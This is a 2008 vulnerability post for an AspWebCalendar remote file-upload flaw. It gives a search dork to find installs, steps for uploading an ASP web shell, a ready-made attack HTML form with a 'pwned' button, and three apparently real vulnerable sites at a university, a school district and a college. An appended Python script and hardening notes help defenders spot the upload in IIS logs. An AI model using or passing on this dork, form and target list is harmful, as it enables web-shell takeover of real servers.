Securityvulns | SECURITYVULNS:DOC:20061
Jun 19, 2008 - 12:00 a.m.

AspWebCalendar 2008 Remote File Upload Vulnerability

Title:AspWebCalendar 2008 Remote File Upload Vulnerability

Discovered by : Alemin_Krali

Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your ASP shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post'
ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&amp;form=&amp;element=&#39;&gt;&lt;FONT
<FONT COLOR='blue'
>http://example.com/path/calendar/eventimages/&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;INPUT TYPE=FILE
SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>

ex1:http://bugs.mimnet.northwestern.edu/ConfRoomCal//calendar_admin.asp?action=uploadfile
ex2:http://calendar.newpal.k12.in.us//calendar_admin.asp?action=uploadfile
ex3:http://macomb.cc.mi.us/calendar//calendar_admin.asp?action=uploadfile

Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed
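
For defenders running AspWebCalendar, the two request patterns this advisory names (the `calendar_admin.asp?action=uploadfile` / `uploadfileprocess` endpoint and script files requested from `calendar/eventimages/`) can be searched for in IIS logs. The following is an added example, not part of the original advisory; the log lines are constructed, and the W3C field layout and the list of script extensions are assumptions.

```python
import re

# Constructed sample in IIS W3C extended format (documentation-range IPs).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-06-20 10:01:02 198.51.100.7 GET /cal/calendar.asp eventdetail=12 200
2008-06-20 10:01:09 203.0.113.9 GET /cal/calendar_admin.asp action=uploadfile 200
2008-06-20 10:01:15 203.0.113.9 POST /cal/calendar_admin.asp action=uploadfileprocess&form=&element= 200
2008-06-20 10:01:21 203.0.113.9 GET /cal/calendar/eventimages/x.asp - 200
2008-06-20 10:02:00 198.51.100.7 GET /cal/calendar/eventimages/picnic.jpg - 200
2008-06-20 10:03:00 198.51.100.8 GET /cal/calendar/EventImages/Y.ASA - 404
"""

# Upload actions named in the advisory, matched as a whole query parameter.
UPLOAD_ACTION = re.compile(r"(?:^|&)action=uploadfile(?:process)?(?:&|$)", re.I)
# Assumption: extensions IIS commonly maps to a script engine.
SCRIPT_EXT = re.compile(r"/eventimages/[^/]*\.(?:asp|asa|cer|cdx|aspx|ashx)$", re.I)

def parse(log_text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, parts))

def findings(log_text):
    """Return (kind, client_ip, uri_stem, status) for each suspicious request."""
    out = []
    for r in parse(log_text):
        stem, query = r["cs-uri-stem"], r["cs-uri-query"]
        if stem.lower().endswith("/calendar_admin.asp") and UPLOAD_ACTION.search(query):
            kind = "upload-submit" if r["cs-method"] == "POST" else "upload-form"
        elif SCRIPT_EXT.search(stem):
            kind = "script-in-eventimages"
        else:
            continue
        out.append((kind, r["c-ip"], stem, r["sc-status"]))
    return out

if __name__ == "__main__":
    for f in findings(SAMPLE_LOG):
        print(*f)
```

A `script-in-eventimages` hit with status 200 means a script file exists in the image directory and was served, which warrants inspecting that directory on disk; disabling script execution for `eventimages` in IIS and requiring authentication on `calendar_admin.asp` remove the condition the advisory relies on.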